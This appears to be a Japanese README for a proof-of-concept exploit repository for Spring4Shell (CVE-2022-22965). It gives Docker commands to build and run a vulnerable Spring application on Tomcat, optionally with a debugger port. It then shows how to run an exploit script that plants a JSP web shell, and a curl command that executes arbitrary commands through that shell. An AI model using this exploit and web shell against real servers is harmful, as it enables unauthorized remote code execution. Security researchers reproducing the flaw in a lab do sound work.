
CVE-2022-22965 Spring4Shell の PoC とエクスプロイト
Spring4Shell (CVE-2022-22965) の概念実証コードです。脆弱なTomcatサーバー上で動作する、Spring4Shellの脆弱性を持つアプリケーションを含んでいます。
docker build . -t spring4shell
docker run -p 80:8080 spring4shell
必要に応じてデバッガポートも公開して実行することもできます:
docker run -p 80:8080 –p 5005:5005 spring4shell
IntelliJ IDEAでリモートデバッガを設定する方法の詳細は、元のブログ記事を参照してください。
./exploit.sh --url http://localhost/spring4shell/hello --dir spring4shell
その後、以下のように任意のコマンドをリモートで実行できます:
curl http://localhost/spring4shell/shell.jsp?cmd=id --output -
...または上記のURLにブラウザでアクセスしても実行できます。